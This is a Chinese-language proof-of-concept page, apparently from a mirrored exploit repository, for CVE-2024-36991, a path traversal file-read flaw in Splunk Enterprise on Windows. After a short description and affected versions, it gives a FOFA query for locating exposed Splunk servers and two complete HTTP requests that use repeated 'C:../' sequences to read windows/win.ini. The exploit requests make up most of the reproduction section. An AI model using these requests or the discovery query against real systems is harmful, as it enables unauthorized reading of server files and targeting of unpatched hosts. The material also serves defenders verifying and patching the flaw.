admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-29 09:40:31 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/SplunkEnterprise/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md

47 lines
1.8 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Splunk Enterprise任意文件读取漏洞(CVE-2024-36991)
# 一、漏洞简介
Splunk是美国Splunk公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据包括所有IT系统和基础结构物理、虚拟机和云生成的数据。Splunk存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。
# 二、影响版本
+ 9.2<=Splunk Enterprise<9.2.2
+ 9.1<=Splunk Enterprise<9.1.5
+ 9.0<=Splunk Enterprise<9.0.10
# 三、资产测绘
+ fofa`app="splunk-Enterprise"`
+ 特征
![1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3.png](./img/MgsperMvGBWWALbV/1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3-225104.png)
# 四、漏洞复现
```http
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host:
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
```
![1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5.png](./img/MgsperMvGBWWALbV/1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5-430061.png)
```http
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host:
Accept-Encoding:gzip,deflate,br
Accept:*/*
Accept-Language:en-US;q=0.9,en;q=0.8
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
Connection:close
Cache-Control:max-age=0
```
![1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d.png](./img/MgsperMvGBWWALbV/1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d-711831.png)
> 更新: 2024-09-05 23:24:41
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ovx0hur1ngmfy7f9>
Reference in New Issue Copy Permalink